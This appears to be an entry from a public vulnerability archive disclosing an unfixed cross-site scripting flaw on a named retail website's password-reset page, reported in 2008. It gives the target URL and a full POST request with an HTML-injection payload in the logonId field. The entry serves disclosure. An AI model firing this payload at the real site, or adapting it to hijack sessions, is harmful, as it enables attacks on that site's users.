Security researcher C1c4Tr1Z, has submitted on 29/04/2008 a cross-site-scripting (XSS) vulnerability affecting www.blair.com, which at the time of submission ranked 26626 on the web according to Alexa. 
We manually validated and published a mirror of this vulnerability on 10/05/2008. It is currently unfixed. 
If you believe that this security issue has been corrected, please send us an e-mail. | 
 
              | Date submitted: 29/04/2008 | 
Date published: 10/05/2008 | 
Fixed? Mail us! | Status:   UNFIXED |  
 
| Author: C1c4Tr1Z | 
Domain: www.blair.com | 
Category: XSS | 
Pagerank: 26626 | 
 
 
 
| URL: https://www.blair.com/webapp/wcs/stores/servlet/ResetPassword | 
 
 
| POST: challengeAnswer=-&storeId=10001&catalogId=10001&langId=-1&state=passwdconfirm&URL=ResetPasswordForm& logonId=%22%3E%3Ch1%3EHacker+Safe%3F XSS by C1c4Tr1Z!%3C%2Fh1%3E&Submit.x=32&Submit.y=17&Submit=Submit | 
 
| 
Click here to view the mirror
 | 
 
| 
 | 
 
 
         
 |